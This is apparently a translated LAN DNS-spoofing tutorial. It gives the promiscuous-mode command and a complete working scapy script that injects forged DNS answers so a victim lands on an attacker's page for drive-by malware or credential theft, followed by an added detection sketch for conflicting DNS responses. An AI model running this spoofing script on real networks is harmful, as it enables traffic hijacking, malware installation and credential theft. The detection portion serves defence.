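Suppose there are two people on the same LAN: Bob and Eve. Eve wants Bob to visit a malicious web page she has created, so that she can install malware on Bob's computer through a drive-by download, or present a spoofed site to try to steal Bob's credentials.
(Image from the link provided above)
(The test environment here runs CentOS 6.5 throughout)
1. Put the attacker server's network interface into promiscuous mode so that it can capture all packets on the LAN: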
ifconfig em1 promisc
Check the interface mode: ifconfig em1
This shows that the interface is now in promiscuous mode.
2. Write the attack code:
Open the dns_spoof.py script file:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from scapy.all import *
import time
import logging

logger = logging.getLogger('main')
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
logger.setLevel(logging.DEBUG)
# Set the interface for scapy to use
conf.iface = 'br0'
# Set the spoofed response
spoofed_ip = '192.168.28.118'

def send_response(x):
    # Get the requested domain
    req_domain = x[DNS].qd.qname
    logger.info('Found request for ' + req_domain)
    # First, we delete the existing lengths and checksums.
    # We will let Scapy re-create them
    del(x[UDP].len)
    del(x[UDP].chksum)
    del(x[IP].len)
    del(x[IP].chksum)
    # Let's build our response from a copy of the original packet
    response = x.copy()
    # We need to start by changing our response to be "from-ds", or from the access point.
    response.FCfield = 2
    # Switch the MAC addresses
    #response.addr1,response.addr2 = x.addr2,x.addr1
    response.src, response.dst = x.dst, x.src
    # Switch the IP addresses
    response[IP].src, response[IP].dst = x[IP].dst, x[IP].src
    # Switch the ports
    response.sport, response.dport = x.dport, x.sport
    # Set the DNS flags
    response[DNS].qr = 1
    response[DNS].ra = 1
    response[DNS].ancount = 1
    # Let's add on the answer section
    response[DNS].an = DNSRR(
        rrname = req_domain,
        type = 'A',
        rclass = 'IN',
        ttl = 900,
        rdata = spoofed_ip
    )
    # Now, we inject the response!
    sendp(response)
    logger.info('Sent response:' + req_domain + ' -> ' + spoofed_ip + '\n')

def main():
    logger.info('Starting to intercept [CTRL+C to stop]')
    sniff(prn=lambda x: send_response(x), lfilter=lambda x: x.haslayer(UDP) and x.dport == 53)

if __name__ == "__main__":
    # Make it happen!
    main()
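The script above only injects a forged answer and does nothing to stop the real resolver's reply, so the client's query ends up with two responses carrying the same transaction ID but different addresses. The following detection sketch is an added example, not part of the original post; the `Resp` record layout, the `find_conflicts` name, the 2-second window and all sample values except the page's `spoofed_ip` are assumptions.

```python
from collections import defaultdict, namedtuple

# One DNS response as a passive sensor might record it (field names are assumptions).
Resp = namedtuple("Resp", "ts client_ip client_port txid qname answers")

def find_conflicts(responses, window=2.0):
    """Flag queries that received two responses with different A records."""
    by_query = defaultdict(list)
    for r in responses:
        # A response is tied to its query by client address, port, ID and name.
        key = (r.client_ip, r.client_port, r.txid, r.qname.lower().rstrip("."))
        by_query[key].append(r)
    alerts = []
    for (client, _port, txid, qname), group in by_query.items():
        group.sort(key=lambda r: r.ts)
        first = group[0]
        for later in group[1:]:
            if later.ts - first.ts > window:
                break  # far apart in time: ID/port reuse, not a race
            if set(later.answers) != set(first.answers):
                alerts.append({"client": client, "txid": txid, "qname": qname,
                               "first": sorted(first.answers),
                               "later": sorted(later.answers)})
                break
    return alerts

# Constructed sample data; only 192.168.28.118 (the page's spoofed_ip) is from the page.
SAMPLE = [
    # Forged answer arrives first, the resolver's real answer shortly after.
    Resp(10.001, "192.168.28.50", 40001, 0x1A2B, "example.com.", ("192.168.28.118",)),
    Resp(10.030, "192.168.28.50", 40001, 0x1A2B, "example.com.", ("203.0.113.10",)),
    # Retransmitted identical answer: not a conflict.
    Resp(11.000, "192.168.28.50", 40002, 0x0042, "example.org.", ("203.0.113.20",)),
    Resp(11.050, "192.168.28.50", 40002, 0x0042, "example.org.", ("203.0.113.20",)),
    # Same ID and port reused a minute later with a new address: outside the window.
    Resp(20.0, "192.168.28.50", 40003, 0x0099, "example.net.", ("203.0.113.30",)),
    Resp(80.0, "192.168.28.50", 40003, 0x0099, "example.net.", ("203.0.113.31",)),
]

if __name__ == "__main__":
    for alert in find_conflicts(SAMPLE):
        print("conflicting DNS answers:", alert)
```

The alert reports both answer sets because the sensor alone cannot tell which of the two responses is the forged one.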